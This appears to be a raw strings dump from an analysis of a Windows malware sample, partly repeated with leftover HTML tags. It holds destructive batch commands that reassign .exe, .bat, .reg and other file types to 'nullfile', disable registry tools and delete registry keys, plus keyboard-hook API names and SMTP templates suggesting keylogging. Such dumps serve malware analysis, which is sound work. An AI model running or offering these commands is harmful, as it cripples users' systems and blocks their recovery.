SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
.W %C
%.wbe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.1.0.0" type="win32" /><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(http://www.eyuyan.com)
%original file name%.exe_1808_rwx_00401000_000E4000:
(The strings recovered from this region repeat, in the same order, those listed for the process dump above, from t$(SSh through the SafeBoot\Network subkeys, at which point the page is cut off.)
Boot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff</pre><pre>
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders</pre><pre>assoc .exe=nullfile</pre><pre>assoc .reg=nullfile</pre><pre>assoc .bat=nullfile</pre><pre>assoc .cmd=nullfile</pre><pre>assoc .vbs=nullfile</pre><pre>assoc .txt=nullfile</pre><pre>assoc .com=nullfile</pre><pre>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\bluestacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f</pre><pre>@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat</pre><pre>goto 22c:\slears.bat</pre><pre>.slear</pre><pre>d:\sleartest.exe</pre><pre>adm-music.com</pre><pre>O%u,%</pre><pre>J÷%</pre><pre>ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP</pre><pre>fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP</pre><pre>c:\windows\system32\</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>iphlpapi.dll</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>User32.dll</pre><pre>Gdi32.dll</pre><pre>Kernel32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? 
/ %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>www.dywt.com.cn</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>c:\%original file name%.exe</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>GetCPInfo</pre><pre>WinExec</pre><pre>GetProcessHeap</pre><pre>RegOpenKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>GetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>SetViewportExtEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportOrgEx</pre><pre>GetViewportOrgEx</pre><pre>ShellExecuteA</pre><pre>GetKeyState</pre><pre>SetWindowsHookExA</pre><pre>GetKeyboardLayout</pre><pre>VkKeyScanExA</pre><pre>keybd_event</pre><pre>CreateDialogIndirectParamA</pre><pre>UnhookWindowsHookEx</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>(*.*)</pre></f></pre></f>